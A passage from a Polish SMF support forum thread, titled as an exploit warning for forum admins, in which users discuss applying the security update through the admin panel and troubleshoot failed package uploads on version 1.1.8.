Pojawia się informacja że twoje forum wymaga aktualizacji i w tym czerwonym polu jest link, po kliknieciu nastąpi aktualizacja.
Oczywiście tak jak w przypadku innych modyfikacji, nastąpi przekierowanie i zobaczysz wypisane te pliki i jeśli gdzieś będzie nie tak, to trzeba dłubnąc w plikach, ale nie sądzę. Tomku, nie licząc tego co na localhoście, zaktualizowałem 23 fora w mniej niż 10 minut!
Naprawdę nic skomplikowanego.

Oczywiście, jak by był jakiś problem to pisz.

Pozdrawiam
roco

// Edit: Dopiero jak by nie poszło z automatu to wrzuca się paczkę tak jak przy wrzucaniu moda, normalnie z PA. Ale nie wierzę, żeby aktualka sprawiała kłopot.

// Edit 2: Dobra, ok, to po ostatniej wersji, jest zaostrzenie i odbija się na sesji, jednak ta modyfikacja to również poprawia.

- Zmień u siebie w profilu styl na default i wejdź do PA i ponów,
- jeśli nie pójdzie to klikasz na pakiety i tam też jest ten link do aktualki

I można próbować naprzemiennie, za którymś razem zaskoczy, mi też w kilku miejscach nie weszło od razu. Nie pękaj tylko zaktualizuj hehe
Na skórce defaultowej idzie najszybciej i nie gubi sesji.



Attention! Testing modifications - Steam Profile

IP IP Zapisane
Full Member
***
Offline
06.03.2013 10:36:28
 Poland Mężczyzna
Poland
 
Link:  http://poligon.ricoroco.com/fora/smf/index.php?topic=278.msg652#msg652 Post #11 
Jak wyżej link wyskakuje forbiden 404 a na drugiem forum że paliek jest uszkodzony i nie do tej wersji być możne forum choć mam 1.1.8 - tak ma dużo ludzi bo pisze o tym na innych forach. Musze to zrobić inaczej ale jak.

edit. Testuje wrzucenie paczki tak samo jak moda tak?

edit2 :

Wystąpił błąd!
Wysyłany pakiet nie jest poprawnym pakietem lub został uszkodzony.

aniech to co jest zawsze u mnie nie tak.


IP IP Zapisane
Strony: [1] 2 3   TOP^Do góry
   Drukuj   
On-Line: 3 Gości, 0 Użytkowników
 
Skocz do:  

Podobne Tematy
  Temat Zaczęty przez Odpowiedzi Wyświetleń Ostatnia wiadomość
normal_post RSS Uwaga! - INFO - Zanim napiszesz - przeczytaj! roco 0 1183 Ostatnia wiadomość 27.08.2008 17:54:07
Autor roco
* Share this topic...
In a forum
[BBCode]
[url=http://poligon.ricoroco.com/fora/smf/index.php?topic=278.0]Uwaga! Exploit - ważne info dla Adminów skryptu SMF!![/url]
In a site/blog
[xHTML]
<a href="http://poligon.ricoroco.com/fora/smf/index.php?topic=278.0" target="_blank">Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!</a>
Geo Visitors Map